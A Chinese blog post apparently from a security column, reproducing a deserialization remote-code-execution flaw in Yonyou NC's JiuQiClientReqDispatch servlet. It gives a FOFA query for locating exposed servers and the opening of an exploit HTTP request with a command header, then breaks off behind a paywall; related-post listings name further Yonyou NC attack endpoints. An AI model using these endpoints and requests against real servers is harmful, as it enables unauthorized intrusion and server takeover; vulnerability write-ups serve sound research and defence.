用友NC JiuQiClientReqDispatch反序列化RCE漏洞复现

已于 2023-12-05 23:19:23 修改
阅读量1k 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全
于 2023-12-05 22:41:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134818872
版权

0x01 产品简介

 用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

  用友 NC JiuQiClientReqDispatch 接口存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="用友-UFIDA-NC"

4b4ae218e3ea4146b47d31168a7af2a9.png

0x04 漏洞复现 

Exp

POST /servlet/~ic/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (K
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友 NCNC Cloud 多处反序列化RCE漏洞复现
0xSec
12-17 1568
用友 NCNC Cloud存在多处反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC FileUploadServlet 反序列化RCE漏洞复现
0xSec
12-04 1430
用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友 NC uploadControl/uploadFile 文件上传致RCE漏洞复现
0xSec
06-11 656
用友 NC uploadControl/uploadFile 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
Goby漏洞更新 | 用友NC com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch 反序列化命令执行漏洞
m0_46699477的博客
04-06 1041
用友NC是为集团与行业企业提供的全线管理软件产品。用友NC JiuQiClientReqDispatch路由,其中存在反序列化导致命令执行。
用友 NC actionhandlerservlet 反序列化漏洞复现
qq_39573664的博客
01-03 2470
用友 NC actionhandlerservlet处存在反序列化漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
用友NC Cloud FileParserServlet反序列化RCE漏洞复现
0xSec
12-05 1098
用友 NC Cloud FileParserServlet接口存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
【简单记】用友NC6.5_RCE
Anderlos
09-13 2649
【影响版本】 用友NC6.5 【漏洞利用过程】 FOFA搜索: title=="YONYOU NC" 或谷歌搜索: title:YONYOU NC 漏洞利用地址: http://地址/servlet/~ic/bsh.servlet.BshServlet exec执行系统命令 ------小记
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1682
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet反序列化2
07-25
用友 NC XbrlPersistenceServlet反序列化漏洞描述用友 NC XbrlPersistenceServlet反序列化漏洞漏洞影响用友NC漏洞
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
04-22
### Nacos JRaft Hessian 反序列化 RCE 分析 #### 一、背景介绍 Nacos 是阿里巴巴开源的一款易于构建云原生应用的动态服务发现、配置管理和服务管理平台。JRafT 是 SOFAStack 微服务平台中的一个分布式一致性组件...
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 5557
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友NC BeanShell_未授权RCE
soldi_er的博客
07-13 1188
文章目录漏洞信息FofaZoomeye 漏洞信息   漏洞信息:CNVD-2021-30167,2021年6月通报。存在一个未授权的执行命令的接口,访问即可执行任意命令。   影响版本:NC 6.5 Fofa   fofa.so搜索语句:icon_hash=“1085941792” Zoomeye   zoomeye.org搜索语句:app:“Yonyou NC httpd”   直接点击ip地址右边的访问箭头➡️,进入首页: 直接访问/servlet/~ic/bsh.servlet.BshServl
用友NC pagesServlet SQL注入致RCE漏洞复现(XVE-2024-13067)
0xSec
06-03 737
用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友NC saveImageServlet 任意文件上传漏洞复现(XVE-2024-7471)
0xSec
04-12 701
用友 NC saveImageServlet 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2190
用友NCNC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
用友U8cloud所有版本TableInputOperServlet反序列化rce漏洞扫描脚本和exp脚本
weixin_43167326的博客
01-22 694
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在于用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值